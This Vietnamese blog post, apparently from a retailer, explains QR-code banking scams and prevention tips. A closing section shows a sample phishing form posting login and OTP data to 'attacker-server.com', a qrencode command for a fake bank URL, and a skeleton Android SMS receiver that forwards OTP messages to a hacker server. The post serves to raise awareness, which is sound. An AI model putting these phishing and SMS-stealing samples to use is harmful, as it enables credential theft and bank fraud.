Mã QR (Quick Response) đã trở thành một phần quen thuộc trong cuộc sống hàng ngày như một cách nhanh chóng để chúng ta truy cập thông tin, thanh toán hoặc tải ứng dụng. Tuy nhiên, những kẻ lừa đảo đã lợi dụng điều này để thiết kế các chiến dịch lừa đảo qua mã QR, gây ra nhiều thiệt hại tài chính và an ninh thông tin. Trong bài viết này hãy cùng Vonebuy tìm hiểu cách thức hoạt động của hình thức lừa đảo này và các biện pháp phòng tránh.
Theo video nạn nhân chia sẻ thì chị mất sạch tiền trong tài khoản chưa tới 5S khi chuyển tiền thông qua hình thức QR code hoàn toàn là tin giả
Thực tế, việc quét mã QR không thể tự động trích tiền trong tài khoản nếu người dùng không thực hiện thêm các bước xác nhận giao dịch. Việc lan truyền những thông tin như vậy không chỉ gây hoang mang dư luận mà còn tiếp tay cho sự hiểu lầm về công nghệ bảo mật hiện đại.
Cách kẻ gian lừa đảo qua mã QR để chiếm đoạt tiền
🧩 Bước 1: Tạo mã QR giả mạo
- Mã QR có thể trông giống mã thanh toán, nhận khuyến mãi, truy cập Wi-Fi, hoặc tải app.
- Được dán ở nơi công cộng như: quán ăn, cây ATM, bãi giữ xe, cột điện, thang máy, hoặc gửi qua tin nhắn / mạng xã hội.
💻 Bước 2: Chuyển hướng nạn nhân đến trang web lừa đảo
Sau khi bạn quét mã, nó sẽ không dẫn đến trang thật mà dẫn đến:
- Trang giả mạo ngân hàng / ví điện tử, yêu cầu bạn nhập:
- Tên đăng nhập
- Mật khẩu
- Mã OTP
- Mã PIN
- Hoặc liên kết đến file cài ứng dụng độc hại (thường là file
.apkcho Android), giả mạo app ngân hàng.
🔓 Bước 3: Chiếm quyền tài khoản và rút sạch tiền
- Nếu bạn nhập thông tin, kẻ gian dùng ngay để đăng nhập vào tài khoản ngân hàng/ ví điện tử, thực hiện giao dịch.
- Nếu bạn cài app lừa đảo, app đó có thể:
- Theo dõi thao tác bàn phím (keylogger)
- Gửi dữ liệu về máy chủ của hacker
- Tự động chụp/đọc OTP, thông báo hệ thống
❗Ví dụ thực tế:
Một số nạn nhân mất từ vài triệu đến cả trăm triệu chỉ vì:
- Quét mã QR giảm giá giả tại quán ăn.
- Cài app từ mã QR “nhận quà Tết”.
- Quét mã “xác thực danh tính” gửi qua Zalo/Facebook.
✅ Cách phòng tránh:
- Không quét mã QR trôi nổi không rõ nguồn gốc.
- Luôn kiểm tra kỹ đường link sau khi quét – có đáng tin không?
- Không nhập OTP / thông tin tài khoản vào website lạ.
- Cập nhật phần mềm diệt virus & kích hoạt xác thực 2 lớp (2FA).
- Tải app chính thức từ App Store / CH Play, không qua mã QR lạ.
Quét mã QR, máy lag 5 giây rồi mất sạch tiền
nghe như ảo thuật công nghệ, nhưng thực tế đã và đang xảy ra – nhất là với người dùng Android và không bật các lớp bảo mật cần thiết. Dưới đây là 1 số giả định mà hacker có thể sử dụng để lừa đảo
🧠 1. Mã QR chứa đường dẫn độc hại (malicious URL)
Khi bạn quét mã QR, nếu thiết bị của bạn tự động mở đường dẫn (mà không hỏi lại), nó có thể:
- Tải một file .apk (ứng dụng Android) độc hại.
- Hoặc chuyển đến một trang web chứa mã JavaScript nguy hiểm (tấn công trình duyệt, đánh cắp cookie, token đăng nhập…).
⏱️ Khoảng “lag 5 giây” có thể là lúc:
- Điện thoại đang tải và cài app ngầm (nếu bạn đã từng cho phép cài app ngoài CH Play).
- Hệ thống bị chiếm quyền xử lý tạm thời bởi mã độc đang hoạt động.
💥 2. App độc hại chiếm quyền truy cập tài khoản
Khi app độc hại được cài đặt xong, nó có thể:
- Đọc tin nhắn SMS, từ đó lấy mã OTP.
- Giả mạo giao diện ứng dụng ngân hàng, lừa bạn tự nhập thông tin.
- Gửi dữ liệu ra bên ngoài: tài khoản, mật khẩu, danh bạ, mã xác thực…
❗ Nếu bạn đã từng đăng nhập vào ứng dụng ngân hàng, app giả có thể:
- Ghi lại thao tác bàn phím (keylogger).
- Chụp màn hình và gửi về máy chủ hacker.
🧨 3. Mất tiền tự động – không cần bạn thao tác thêm
Khi kẻ gian đã có:
- Số tài khoản + mật khẩu đăng nhập.
- Mã OTP (qua SMS hoặc qua app bị cài).
- Thậm chí là mã Smart OTP (nếu bạn dùng nhưng bị cài app giả mạo).
👉 Chúng sẽ thực hiện giao dịch chuyển tiền nhanh, rút sạch trong vài phút – trước cả khi bạn kịp gọi ngân hàng.
Hacker tạo mã độc QR như thế nào ?
Bước 1: Tạo trang web giả mạo
Giả sử hacker tạo 1 trang web giả mạo như sau:
http://fakebank-login.comGiao diện giống hệt trang ngân hàng thật, có ô nhập:
<form action="http://attacker-server.com/steal" method="POST">
<input name="username" placeholder="Tài khoản ngân hàng" />
<input name="password" type="password" placeholder="Mật khẩu" />
<input name="otp" placeholder="Mã OTP" />
<button type="submit">Đăng nhập</button>
</form>
Trang này gửi toàn bộ dữ liệu người dùng nhập về server của hacker.
Bước 2: Tạo mã QR trỏ đến trang giả
Hacker dùng công cụ như:
- QR Code Generator
qrencodetrong terminal (Linux/Mac)
qrencode -o qrlure.png "http://fakebank-login.com"Ví dụ 2: Mã độc .apk đánh cắp OTP
Giả lập mã độc .apk có khả năng:
- Đọc tin nhắn SMS (để lấy OTP)
- Theo dõi thao tác người dùng (keylogger)
- Tự động gửi dữ liệu về hacker
qrencode -o qrlure.png "http://fakebank-login.com"AndroidManifest.xml (trích đoạn quyền nguy hiểm):
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.READ_SMS" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>MainActivity.java (giả lập đọc SMS):
public class SmsReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
Object[] pdus = (Object[]) intent.getExtras().get("pdus");
for (Object pdu : pdus) {
SmsMessage sms = SmsMessage.createFromPdu((byte[]) pdu);
String msg = sms.getMessageBody();
// Gửi về server hacker
sendToServer(msg);
}
}
private void sendToServer(String content) {
// Gửi HTTP POST đến hacker
// (đoạn này có thể dùng HttpURLConnection hoặc thư viện khác)
}
}
Ứng dụng này sẽ được build dưới dạng .apk, tải lên hosting, rồi hacker tạo mã QR trỏ tới file đó như:
http://malicious-domain.com/fakebank.apk✅ KẾT LUẬN
Bài viết này được thực hiện với mục đích giúp mọi người nâng cao nhận thức, hiểu rõ cách thức hoạt động của các chiêu trò lừa đảo qua mã QR – từ đó phòng tránh hiệu quả, bảo vệ thông tin cá nhân và tài sản của chính mình.
Chúng tôi không có bất kỳ mục đích nào nhằm hướng dẫn tạo mã độc, tấn công hay thực hiện hành vi vi phạm pháp luật.
Việc mô tả quy trình lừa đảo chỉ mang tính minh họa để cảnh báo cộng đồng, giúp mọi người tỉnh táo hơn trước các thủ đoạn ngày càng tinh vi.
Công nghệ chỉ thực sự an toàn khi người dùng đủ hiểu biết để tự bảo vệ mình.
